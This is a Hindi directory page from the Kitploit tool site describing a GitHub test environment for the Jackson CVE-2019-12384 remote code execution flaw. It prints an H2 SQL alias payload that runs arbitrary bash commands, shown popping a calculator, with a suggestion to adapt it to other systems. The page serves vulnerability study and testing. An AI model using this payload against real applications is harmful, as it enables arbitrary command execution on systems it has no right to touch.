Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Jackson_RCE-CVE-2019-12384 — CVE-2019-12384 भेद्यता परीक्षण वातावरण | Kitploit
उपकरण/GitHubGitHub/magiczer0/jackson_rce-cve-2019-12384
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubmagiczer0/jackson_rce-cve-2019-12384

Jackson_RCE-CVE-2019-12384

CVE-2019-12384 भेद्यता परीक्षण वातावरण

रिपॉजिटरी देखें
2143 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

पर्यावरण सेटअप

प्रोजेक्ट को IDEA में आयात करें, Maven कॉन्फ़िगर करने के बाद स्वचालित निर्भरता आयात सेट करें, फिर स्थानीय वेब निर्देशिका में निम्नलिखित फ़ाइल लिखें और इसे exec.sql के रूप में सहेजें। और एक HTTP सर्वर प्रारंभ करें:

root@kitploit:~
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"/bin/bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
    return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')

कृपया कोड के संबंधित भागों को संशोधित करें ताकि विभिन्न ऑपरेटिंग सिस्टम वातावरणों के अनुकूल हो सके।

चलाने का परिणाम

कैलकुलेटर पॉप अप होता देखा जा सकता है।

भेद्यता संदर्भ

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

https://www.anquanke.com/post/id/182695

टूल डाउनलोड करें